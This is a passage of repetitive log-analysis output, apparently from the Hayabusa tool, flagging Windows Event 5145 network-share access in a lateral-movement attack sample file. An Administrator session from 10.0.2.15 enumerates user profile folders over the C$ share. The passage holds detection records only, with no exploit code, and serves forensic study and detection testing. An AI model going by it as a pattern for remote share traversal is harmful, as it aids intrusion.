10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Saved 
Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Documents 
: IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
